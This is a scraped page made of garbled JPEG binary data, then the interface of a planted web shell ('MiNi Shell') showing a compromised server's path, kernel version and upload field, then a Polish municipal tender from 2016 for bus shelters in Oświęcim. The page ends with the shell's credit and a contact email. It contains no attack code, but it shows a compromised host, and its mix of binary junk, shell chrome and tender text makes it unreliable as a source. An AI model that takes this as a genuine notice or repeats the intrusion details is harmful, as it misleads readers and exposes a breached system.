JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160203/11795-N-2016.html

<p class="kh_header"><b>Oświęcim: Budowa jednej wiaty przystankowej przy ul. Gospodarczej (część I zamówienia) oraz dwóch wiat przystankowych przy ul. Pilata w Oświęcimiu (część II zamówienia).</b><br>
<b>Numer ogłoszenia: 11795 - 2016; data zamieszczenia: 03.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Oświęcim , ul.Zaborska 2, 32-600 Oświęcim, woj. małopolskie, tel. 033 8429311,8429311, faks 033 8429199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa jednej wiaty przystankowej przy ul. Gospodarczej (część I zamówienia) oraz dwóch wiat przystankowych przy ul. Pilata w Oświęcimiu (część II zamówienia)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia:
Przedmiot zamówienia podzielony jest na dwie części.
1) Część I zamówienia
Budowa jednej wiaty przystankowej przy ul. Gospodarczej.

Inwestycja obejmuje montaż wiaty oraz utwardzenie terenu pod wiatą (nawierzchnia z kostki brukowej). Ponadto istniejący kabel energetyczny (oświetleniowy) należy zabezpieczyć rurą ochronną.
Zakres prac obejmuje zakup, dostawę i montaż wiaty 3 modułowej typu MERCURY 2005 lub równoważnej. Wiatę należy osadzić na prefabrykowanych fundamentach. 
Wymiary wiaty: około 4,0 x 1,40 m. Wiata wykonana z profili stalowych, ocynkowanych i malowanych proszkowo / lakierowanych; pokrycie dachowe z przyciemnionego poliwęglanu komorowego; przeszklenie ścian szkłem hartowanym o grubości 8 mm; ławka z laminatu kolorowego. Wiata wyposażona w ramkę na rozkład jazdy (format A3), napisy z nazwą przystanku.
W ramach inwestycji należy również zakupić i ustawić betonowy kosz na śmieci
o pojemności 70 l z daszkiem.
Wokół projektowanego utwardzenia terenu pod wiatą należy wykonać zieleniec.

2) Część II zamówienia 
Budowa dwóch wiat przystankowych przy ul. Pilata.

Inwestycja obejmuje demontaż dwóch starych wiat oraz montaż w ich miejsce dwóch nowych wiat przystankowych. Utwardzenie terenu pod wiatami należy odtworzyć (nawierzchnia z kostki brukowej: 80% kostki do ponownego ułożenia, 20% kostki nowej). Warstwy podbudowy pod kostkę należy w całości wykonać od nowa. Ponadto istniejący kabel energetyczny (w razie konieczności) należy zabezpieczyć rurą ochronną. 
Zakres prac obejmuje zakup, dostawę i montaż dwóch wiat 3 modułowych typu MERCURY 2005 lub równoważnych. Wiaty należy osadzić na prefabrykowanych fundamentach. Wymiary wiat: około 4,0 x 1,40 m. Wiaty wykonane z profili stalowych, ocynkowanych i malowanych proszkowo / lakierowanych; pokrycie dachowe z przyciemnionego poliwęglanu komorowego; przeszklenie ścian szkłem hartowanym o grubości 8 mm; ławka z laminatu kolorowego. Wiaty wyposażone w ramkę na rozkład jazdy, ścianka boczna z gablotą, napisy z nazwą przystanku.
Zamawiający dopuszcza możliwość składania ofert częściowych zgodnie z podziałem przedmiotu zamówienia określonym w niniejszej SIWZ. Wykonawca może złożyć ofertę na jedną lub obie części zamówienia. Ocena ofert i wybór wykonawcy zostaną dokonane odrębnie dla każdej   z części zamówienia.

3) Inne roboty i czynności niezbędne do należytego wykonania przedmiotu zamówienia
Wybrany wykonawca (wykonawcy) zobowiązany będzie także do wykonania robót i czynności innych niż określone w pkt. a i pkt b niezbędnych dla należytego wykonania przedmiotu zamówienia, takich jak m.in.:

oznakowanie oraz zabezpieczenie przejętego placu budowy,
zorganizowanie zaplecza budowy (miejsce, pobór energii i wody, dozorowanie itp.),
wytyczenie geodezyjne,
projekt organizacji ruchu na czas budowy oraz wykonanie prac wynikających z tego projektu,
zorganizowanie robót w sposób umożliwiający korzystanie z przystanku,
bieżący wywóz materiałów nieużytecznych z terenu budowy,
nadzory specjalistyczne zarządców sieci wynikające z uzgodnień branżowych,
inwentaryzację geodezyjną bieżącą (roboty zanikowe) i końcową powykonawczą,
sporządzenie pełnej dokumentacji powykonawczej (zaświadczenia właściwych jednostek i organów wymagane przepisami i dokumentacją projektową; niezbędne świadectwa kontroli jakości, certyfikaty i deklaracje zgodności wymagane przepisami, protokoły odbiorów technicznych, instrukcje obsługi i eksploatacji, protokoły badań i sprawdzeń),
ubezpieczenie budowy na czas jej realizacji,
wykonanie robót naprawczych infrastruktury technicznej, której stan techniczny na skutek realizacji robót uległ pogorszeniu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 34.95.33.00-5, 77.31.41.00-5, 71.42.00.00-8, 45.11.13.00-1, 45.11.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego
posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Zamawiający uzna warunek za spełniony na podstawie
oświadczenia wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego
wiedzy i doświadczenia.
Zamawiający uzna warunek za spełniony na podstawie
oświadczenia wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego
dysponowania odpowiednim potencjałem technicznym. 
Zamawiający uzna warunek za spełniony na
podstawie oświadczenia wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego
dysponowania osobami zdolnymi do wykonania zamówienia. 
Zamawiający uzna warunek za spełniony
na podstawie oświadczenia wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań w zakresie spełnienia warunku dotyczącego sytuacji
ekonomicznej i finansowej. 
Zamawiający uzna warunek za spełniony na podstawie oświadczenia
Wykonawcy złożonego wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres rękojmi i gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie treści art. 144 ustawy Pzp zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, za wyjątkiem przypadków określonych w niniejszej specyfikacji w tym: 
a)
zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub rozliczenie wynagrodzenia, np. zmiana wysokości podatku VAT;
b)
z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością,              w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach. Strony za okoliczności siły wyższej uznają: powódź, trzęsienie ziemi, huragany, deszcze nawalne, upadek statku powietrznego, działania wojenne lub ogłoszenie stanu wojennego, strajk ogólnokrajowy lub  ogłoszony stan klęski żywiołowej;
c)
z powodu niemożliwych wcześniej do przewidzenia działań osób trzecich uniemożliwiających wykonanie robót i prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
e)
zmiany terminu wykonania przedmiotu zamówienia w przypadku wystąpienia zamówień dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.oswiecim.pl/zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Oświęcim, Wydział Zamówień Publicznych, ul. Solskiego 2, 32-600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2016 godzina 10:00, miejsce: Urząd Miasta Oświęcim, ul. Zaborska 2, 32-600 Oświęcim, pok. 1 (dziennik podawczy)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa jednej wiaty przystankowej przy ul. Gospodarczej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inwestycja obejmuje montaż wiaty oraz utwardzenie terenu pod wiatą (nawierzchnia z kostki brukowej). Ponadto istniejący kabel energetyczny (oświetleniowy) należy zabezpieczyć rurą ochronną.
Zakres prac obejmuje zakup, dostawę i montaż wiaty 3 modułowej typu MERCURY 2005 lub równoważnej. Wiatę należy osadzić na prefabrykowanych fundamentach. 
Wymiary wiaty: około 4,0 x 1,40 m. Wiata wykonana z profili stalowych, ocynkowanych i malowanych proszkowo / lakierowanych; pokrycie dachowe z przyciemnionego poliwęglanu komorowego; przeszklenie ścian szkłem hartowanym o grubości 8 mm; ławka z laminatu kolorowego. Wiata wyposażona w ramkę na rozkład jazdy (format A3), napisy z nazwą przystanku.
W ramach inwestycji należy również zakupić i ustawić betonowy kosz na śmieci
o pojemności 70 l z daszkiem.
Wokół projektowanego utwardzenia terenu pod wiatą należy wykonać zieleniec..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 34.95.33.00-5, 77.31.41.00-5, 71.42.00.00-8, 45.11.13.00-1, 45.11.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres rękojmi i gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa dwóch wiat przystankowych przy ul. Pilata..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inwestycja obejmuje demontaż dwóch starych wiat oraz montaż w ich miejsce dwóch nowych wiat przystankowych. Utwardzenie terenu pod wiatami należy odtworzyć (nawierzchnia z kostki brukowej: 80% kostki do ponownego ułożenia, 20% kostki nowej). Warstwy podbudowy pod kostkę należy w całości wykonać od nowa. Ponadto istniejący kabel energetyczny (w razie konieczności) należy zabezpieczyć rurą ochronną. 
Zakres prac obejmuje zakup, dostawę i montaż dwóch wiat 3 modułowych typu MERCURY 2005 lub równoważnych. Wiaty należy osadzić na prefabrykowanych fundamentach. Wymiary wiat: około 4,0 x 1,40 m. Wiaty wykonane z profili stalowych, ocynkowanych i malowanych proszkowo / lakierowanych; pokrycie dachowe z przyciemnionego poliwęglanu komorowego; przeszklenie ścian szkłem hartowanym o grubości 8 mm; ławka z laminatu kolorowego. Wiaty wyposażone w ramkę na rozkład jazdy, ścianka boczna z gablotą, napisy z nazwą przystanku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 34.95.33.00-5, 77.31.41.00-5, 71.42.00.00-8, 45.11.13.00-1, 45.11.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com